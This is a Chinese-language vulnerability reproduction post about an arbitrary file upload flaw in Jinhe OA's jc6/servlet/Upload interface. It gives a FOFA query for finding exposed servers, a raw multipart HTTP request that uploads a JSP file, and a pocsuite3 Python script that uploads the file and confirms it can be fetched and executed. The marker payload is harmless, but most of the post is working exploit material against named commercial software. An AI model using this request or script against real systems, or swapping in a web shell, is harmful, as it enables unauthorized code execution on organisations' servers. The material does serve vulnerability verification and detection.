漏洞复现-金和OA jc6/servlet/Upload接口任意文件上传漏洞(附漏洞检测脚本)

炼金术师诸葛亮2024-01-16 8:52

免责声明

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

漏洞描述

金和OA jc6/servlet/Upload接口存在任意文件上传漏洞。

fofa语句

复制代码 
app="金和网络-金和OA"||body="/jc6/platform/sys/login"

poc加检测

复制代码 
POST /jc6/servlet/Upload?officeSaveFlag=0&dbimg=false&path=&setpath=/upload/ HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Type: multipart/form-data; boundary=ee055230808ca4602e92d0b7c4ecc63d

--ee055230808ca4602e92d0b7c4ecc63d
Content-Disposition: form-data; name="img"; filename="1.jsp"
Content-Type: image/jpeg

<% out.println("tteesstt1"); %>
--ee055230808ca4602e92d0b7c4ecc63d--

上传成功后,拼接返回的路径url/jc6/路径

poc脚本

脚本使用pocsuite框架

复制代码 
# _*_ coding:utf-8 _*_
# @Time : 2024/1/16
# @Author: 炼金术师诸葛亮
import re
from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD, random_str

class jinhe_jc6_upload(POCBase):
    pocDesc = '''金和OA jc6/servlet/Upload接口任意文件上传漏洞'''
    author = '炼金术师诸葛亮'
    createDate = '2024-1-16'
    name = '金和OA jc6/servlet/Upload接口任意文件上传漏洞'



    def _verify(self):

        result = {}
        url = self.url+ '/jc6/servlet/Upload?officeSaveFlag=0&dbimg=false&path=&setpath=/upload/'
        check_path = self.url+ "/test.aspx"
        headers = {
            "User-Agent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)",
            "Accept": "*/*",
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
            'Connection': 'close',
            "Content-Type": "multipart/form-data; boundary=ee055230808ca4602e92d0b7c4ecc63d"
        }

        try:
            data = '--ee055230808ca4602e92d0b7c4ecc63d\r\nContent-Disposition: form-data; name="img"; filename="1.jsp"\r\nContent-Type: image/jpeg\r\n\r\n<% out.println("tteesstt1"); %>\r\n--ee055230808ca4602e92d0b7c4ecc63d--'

            response = requests.post(url, headers=headers, data=data)
            if response.status_code == 200 and 'upload' in response.text:
                rtext=response.text
                path = re.search(r"arr\[2]='(.*?)'", rtext)
                if path:
                    check_path = self.url+ '/jc6/' +path.group(1)
                    check_response = requests.get(check_path)
                    if check_response.status_code == 200 and 'tteesstt1' in check_response.text:
                        result['VerifyInfo'] = {}

            return self.parse_output(result)
        except Exception as e:
            pass

register_poc(jinhe_jc6_upload)

脚本利用

相关推荐
用户9623779544820 小时前
VulnHub DC-3 靶机渗透测试笔记
安全
叶落阁主2 天前
Tailscale 完全指南:从入门到私有 DERP 部署
运维·安全·远程工作
用户962377954484 天前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机4 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机4 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954484 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star4 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954484 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher6 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行9 天前
网络安全总结
安全·web安全
热门推荐
01GitHub 镜像站点02OpenClaw 使用和管理 MCP 完全指南03OpenClaw + 飞书(Feishu)环境搭建指南04本地部署 OpenClaw + DeepSeek-R1 完全指南05Window 10部署openclaw报错node.exe : npm error code 12806OpenClaw优化飞书API 额度已耗尽问题07Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services08OpenClaw 连接飞书完整指南:插件安装、配置与踩坑记录09OpenClaw 飞书机器人不回复消息?3 小时踩坑总结10小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)